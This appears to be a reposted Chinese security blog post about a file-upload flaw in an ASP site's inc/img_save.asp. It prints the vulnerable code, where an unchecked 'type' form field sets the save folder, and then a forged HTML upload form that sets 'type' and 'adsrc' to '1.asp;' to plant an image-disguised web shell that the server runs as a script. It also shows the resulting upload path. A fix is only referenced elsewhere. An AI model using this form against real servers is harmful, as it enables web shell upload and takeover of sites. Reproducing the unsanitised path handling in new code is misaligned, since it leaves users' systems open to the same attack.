因需要下了源码看了下

出现在\inc\img_save.asp 文件

 

....省略一千万行....

 

set fs=server.CreateObject("scripting.filesystemobject")

 

set upload=new upload_5xSoft ''建立上传对象

 

'--------将日期转化成文件名--------

 

formPath="/uploadfile/"

 

formpath2=upload.form("type")  //* BUG出现在这里，type值 从from获得 自定义路径

 

formPath=formPath&formPath2 //*路径生成。。。。uploadfile+type

 

if upload.form("adsrc")="" then 

 

adsrc="ADSrc"

 

else

 

adsrc=upload.form("adsrc")

 

end if

 

''在目录后加(/)

 

if right(formPath,1)<>"/" then formPath=formPath&"/"

 

set file=upload.file("picture") ''生成一个文件对象

 

if file.FileSize>0 then ''如果FileSize > 0 说明有文件数据

 

if file.filesize>300000 then

 

response.write"<SCRIPT language=JavaScript>alert('上传图片大于规定(300K),请改变文件大小后重新上传!');"

 

response.write"javascript:history.back(-1)</SCRIPT>"

 

response.end

 

end if

 

FileExt        = Mid(file.Filename, InStrRev(file.Filename, ".")+1)

 

FileExt        = FixName(FileExt)

 

If Not ( CheckFileExt(FileExt) ) Then

 

response.write"<SCRIPT language=JavaScript>alert('上传图片只支持gif|jpg|jpeg|bmp|png 图象文件!');"

 

response.write"javascript:history.back(-1)</SCRIPT>"

 

response.end

 

end if

 

 

 

thename=MakedownName()&"."&FileExt

 

'开始判断会员图片目录是否存在

 

  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

 

    If objFSO.FolderExists(Server.MapPath(""&formPath&"")) Then'如果存在就直接保存图片

 

  file.SaveAs Server.mappath(formPath&thename)

 

  Else

 

  objFSO.CreateFolder(Server.MapPath(""&formPath&""))'不存在就建一个目录

 

  file.SaveAs Server.mappath(formPath&thename)

 

 

 

  Set Jpeg = Server.CreateObject("Persits.Jpeg") '调用组件

 

Path = Server.MapPath(formPath&thename) '待处理图片路径

 

Jpeg.Open Path

 

If Jpeg.OriginalWidth / Jpeg.OriginalHeight > 1 then

 

Jpeg.Width = 350

 

Jpeg.Height = int((350/Jpeg.OriginalWidth)*Jpeg.OriginalHeight)

 

elseif Jpeg.OriginalWidth / Jpeg.OriginalHeight < 1 then

 

Jpeg.Height = 350

 

Jpeg.Width= int(Jpeg.OriginalWidth*(350/Jpeg.Height))

 

end if

 

 

 

Jpeg.Save Server.MapPath(formPath&thename)

 

 

 

  End If

 

  Set objFSO = Nothing      '释放FileSystemObject 对象实例内存空间

 

imgs=thename

 

else

 

response.write"<SCRIPT language=JavaScript>alert('上传文件为空或文件太大!');"

 

response.write"javascript:history.back(-1)</SCRIPT>"

 

response.end

 

end if

 

 

 

%>

 

<script>

 

//alert("上传图片成功")

 

var random = Math.random();

 

window.opener.document.Form1.<%=adsrc%>.value="<%=formpath%><%=imgs%>";  //* 返回路径、文件名路径

 

....省略一千万行....

 

下来伪造表单提交图片马

 

<FORM name=formuppic action=http://www.2cto.com /inc/img_save.asp method=post encType=multipart/form-data>

 

   <input type="hidden" name="adsrc" value="1.asp;"><input type="hidden" name="type" value="1.asp;">

 

   <TBODY>

 

        <TR>

 

          <TD>上传文件:

 

    <input type=file name="picture"> <INPUT style="FONT-SIZE: 9pt" type=submit value="确 定" name=submit>

 

          </TD>

 

        </TR>

 

      </TBODY>  </FORM>

 

上传后会得到地址：window.opener.document.Form1.1.asp;.value="/uploadfile/1.asp;/2011111990914.jpg";

 

www.2cto.com修复：见本站前文

 

摘自 萝卜头’Blog